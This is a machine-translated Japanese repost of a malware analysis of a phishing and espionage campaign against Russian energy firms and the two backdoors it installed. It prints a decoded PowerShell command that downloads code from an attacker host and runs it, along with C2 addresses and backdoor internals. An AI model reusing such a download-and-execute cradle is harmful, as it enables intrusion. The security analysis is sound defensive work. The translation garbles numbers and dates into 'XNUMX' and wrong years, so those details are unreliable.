私たちはロシアの燃料・エネルギー複合施設に対する標的型スパイ攻撃を調査しています。

コンピュータ セキュリティ インシデントの調査における当社の経験によれば、攻撃者が最初に攻撃対象のネットワーク インフラストラクチャに侵入するために電子メールが依然として使用される最も一般的なチャネルの XNUMX つであることがわかります。 疑わしい (またはそれほど疑わしいではない) 手紙に対する XNUMX つの不注意な行動がさらなる感染の入り口となるため、サイバー犯罪者は成功の程度に差はあるものの、ソーシャル エンジニアリング手法を積極的に使用しています。

この投稿では、ロシアの燃料・エネルギー複合施設の多数の企業を標的としたスパム キャンペーンに関する最近の調査についてお話したいと思います。 すべての攻撃は偽の電子メールを使用した同じシナリオに従っており、これらの電子メールのテキスト内容に多くの労力を費やした人はいなかったようです。

探査

すべては 2020 年 XNUMX 月末に始まりました。Doctor Web のウイルス アナリストが、ハッカーがロシアの燃料・エネルギー複合施設の多数の企業の従業員に最新の電話帳を送信するスパム キャンペーンを検出したときです。 もちろん、ディレクトリは実際のものではなく、.docx ドキュメントはリモート リソースから XNUMX つのイメージをダウンロードしたため、これは単純な懸念の表れではありませんでした。

そのうちの 2015 つは、news[.]zannews[.]com サーバーからユーザーのコンピュータにダウンロードされました。 このドメイン名がカザフスタンの汚職撲滅メディアセンター zannews[.]kz のドメインと似ていることは注目に値します。 一方、使用されたドメインは、ICEFOG バックドアを使用し、名前に部分文字列「news」を含むトロイの木馬制御ドメインを備えた TOPNEWS として知られる XNUMX 年の別のキャンペーンをすぐに思い出させました。 もう XNUMX つの興味深い特徴は、異なる受信者に電子メールを送信する場合、画像のダウンロード要求に異なる要求パラメーターまたは一意の画像名のいずれかを使用することです。

これは、適切なタイミングで手紙を開封することが保証される「信頼できる」宛先を特定するための情報を収集する目的で行われたものと考えられます。 SMB プロトコルは、XNUMX 番目のサーバーからイメージをダウンロードするために使用され、これにより、受信したドキュメントを開いた従業員のコンピュータから NetNTLM ハッシュが収集される可能性がありました。

そして、これが偽のディレクトリを含む手紙そのものです:

今年 2019 月、ハッカーは新しいドメイン名 sports[.]manhajnews[.]com を使用して画像をアップロードし始めました。 分析の結果、少なくとも XNUMX 年 XNUMX 月以降、manhajnews[.]com サブドメインがスパムメールに使用されていることが判明しました。 このキャンペーンのターゲットの XNUMX つはロシアの大規模大学でした。

また、XNUMX 月までに攻撃の主催者は手紙の新しい文面を考え出しました。今回の文書には業界の発展に関する情報が含まれていました。 手紙の文面からは、筆者がロシア語を母国語としていないか、意図的に自分自身についてそのような印象を与えていることが明らかであった。 残念ながら、業界発展のアイデアは、いつものように、単なる表紙であることが判明しました。文書は再び XNUMX つの画像をダウンロードし、サーバーは download[.]inklingpaper[.]com に変更されました。

次のイノベーションは XNUMX 月に続きました。 ウイルス対策プログラムによる悪意のあるドキュメントの検出を回避しようとして、攻撃者はパスワードで暗号化された Microsoft Word ドキュメントを使用し始めました。 同時に、攻撃者は古典的なソーシャル エンジニアリング手法である報酬通知を使用することを決定しました。

上訴文は再び同じスタイルで書かれており、受信者の間でさらなる疑惑を引き起こした。 画像をダウンロードするサーバーも変更ありません。

いずれの場合も、手紙の送信には mail[.]ru ドメインと yandex[.]ru ドメインに登録された電子メールボックスが使用されたことに注意してください。

アタック

2020 年 XNUMX 月初旬までに、行動を起こす時期が来ました。 当社のウイルス アナリストは、攻撃者が電話帳の更新を口実に再び手紙を送信する新たな攻撃の波を記録しました。 ただし、今回の添付ファイルには悪意のあるマクロが含まれていました。

添付されたドキュメントを開くと、マクロによって XNUMX つのファイルが作成されました。

• VBS スクリプト %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs。バッチ ファイルを起動するためのものです。
• バッチ ファイル自体 %APPDATA%configstest.bat は難読化されています。

その作業の本質は、特定のパラメータを指定して Powershell シェルを起動することにあります。 シェルに渡されたパラメータはコマンドにデコードされます。

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

提示されたコマンドから分かるように、ペイロードのダウンロード元のドメインは再びニュース サイトに偽装されます。 シンプルな ブートローダー、その唯一のタスクは、コマンド＆コントロールサーバーからシェルコードを受信して​​実行することです。 被害者の PC にインストールできる XNUMX 種類のバックドアを特定できました。

BackDoor.Siggen2.3238

最初のものは BackDoor.Siggen2.3238 — 当社の専門家はこれまで遭遇したことがなく、他のウイルス対策ベンダーからもこのプログラムについての言及はありませんでした。

このプログラムは C++ で書かれ、32 ビット Windows オペレーティング システム上で実行されるバックドアです。

BackDoor.Siggen2.3238 は、HTTP と HTTPS の XNUMX つのプロトコルを使用して管理サーバーと通信できます。 テストされたサンプルは HTTPS プロトコルを使用します。 サーバーへのリクエストでは、次のユーザー エージェントが使用されます。

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

この場合、すべてのリクエストには次のパラメータのセットが指定されます。

%s;type=%s;length=%s;realdata=%send

ここで、各行 %s は次のように置き換えられます。

• 感染したコンピュータのID、
• 送信されるリクエストのタイプ、
• realdata フィールドのデータの長さ、
• データ

感染したシステムに関する情報を収集する段階で、バックドアは次のような行を生成します。

lan=%s;cmpname=%s;username=%s;version=%s;

ここで、lan は感染したコンピュータの IP アドレス、cmpname はコンピュータ名、username はユーザー名、version は行 0.0.4.03 です。

sysinfo 識別子を持つこの情報は、POST リクエストを介して https[:]//31.214[.]157.14/log.txt にあるコントロール サーバーに送信されます。 応答した場合 BackDoor.Siggen2.3238 HEART 信号を受信すると、接続は成功したとみなされ、バックドアはサーバーとの通信のメイン サイクルを開始します。

動作原理のより完全な説明 BackDoor.Siggen2.3238 私たちの中にあります ウイルスライブラリ.

バックドア.ホワイトバード.23

32 番目のプログラムは BackDoor.Whitebird バックドアを修正したもので、カザフスタンの政府機関との事件ですでに知られています。 このバージョンは C++ で書かれており、64 ビットと XNUMX ビットの両方の Windows オペレーティング システムで実行できるように設計されています。

このタイプのほとんどのプログラムと同様、 バックドア.ホワイトバード.23 制御サーバーとの暗号化接続を確立し、感染したコンピュータを不正に制御するように設計されています。 ドロッパーを使用して侵害されたシステムにインストールされる BackDoor.Siggen2.3244.

私たちが調べたサンプルは、次の XNUMX つのエクスポートを含む悪意のあるライブラリでした。

• グーグルプレイ
• テスト。

作業の開始時に、バイト 0x99 との XOR 演算に基づくアルゴリズムを使用して、バックドア本体に組み込まれた設定を復号します。 構成は次のようになります。

struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

一定の動作を保証するために、バックドアはフィールドに指定された値を変更します。 勤務時間 構成。 このフィールドには 1440 バイトが含まれており、値 0 または 1 をとり、XNUMX 日の各時間の各分を表します。 ネットワーク インターフェイスごとに個別のスレッドを作成し、インターフェイスをリッスンし、感染したコンピュータからのプロキシ サーバー上の認証パケットを探します。 このようなパケットが検出されると、バックドアはプロキシ サーバーに関する情報をリストに追加します。 さらに、WinAPI 経由でプロキシの存在を確認します。 InternetQueryOptionW.

プログラムは現在の分と時間をチェックし、フィールド内のデータと比較します。 勤務時間 構成。 対応する分の値がゼロでない場合、コントロール サーバーとの接続が確立されます。

サーバーへの接続を確立すると、クライアントとサーバー間の TLS バージョン 1.0 プロトコルを使用した接続の作成がシミュレートされます。 バックドアの本体には XNUMX つのバッファーが含まれています。

最初のバッファには、TLS 1.0 Client Hello パケットが含まれます。

1.0 番目のバッファには、キー長が 0x100 バイトの TLS XNUMX クライアント キー交換パケット、暗号仕様の変更、暗号化されたハンドシェイク メッセージが含まれています。

Client Hello パケットを送信するとき、バックドアは現在時刻の 4 バイトと、次のように計算された 28 バイトの擬似ランダム データを Client Random フィールドに書き込みます。

v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

受信したパケットは制御サーバーに送信されます。 応答 (Server Hello パケット) は以下をチェックします。

• TLS プロトコル バージョン 1.0 に準拠。
• クライアントによって指定されたタイムスタンプ (ランダム データ パケット フィールドの最初の 4 バイト) とサーバーによって指定されたタイムスタンプの対応。
• クライアントとサーバーのランダム データ フィールドのタイムスタンプ後の最初の 4 バイトの一致。

指定された一致の場合、バックドアはクライアント キー交換パケットを準備します。 これを行うために、クライアント キー交換パッケージの公開キー、および暗号化ハンドシェイク メッセージ パッケージの暗号化 IV と暗号化データを変更します。

次に、バックドアはコマンド アンド コントロール サーバーからパケットを受信し、TLS プロトコルのバージョンが 1.0 であることを確認してから、さらに 54 バイト (パケットの本文) を受け入れます。 これで接続設定は完了です。

動作原理のより完全な説明 バックドア.ホワイトバード.23 私たちの中にあります ウイルスライブラリ.

結論と結論

文書、マルウェア、使用されたインフラストラクチャを分析した結果、この攻撃は中国の APT グループのいずれかによって準備されたものであると自信を持って言えます。 攻撃が成功した場合に被害者のコンピュータにインストールされるバックドアの機能を考慮すると、感染により、少なくとも、攻撃された組織のコンピュータから機密情報が盗まれます。

さらに、非常に可能性の高いシナリオは、特別な機能を備えた特殊なトロイの木馬がローカル サーバーにインストールされることです。 これらには、ドメイン コントローラー、メール サーバー、インターネット ゲートウェイなどが考えられます。例でわかるように、 カザフスタンでの事件、このようなサーバーは、さまざまな理由から攻撃者にとって特に興味深いものです。

出所： habr.com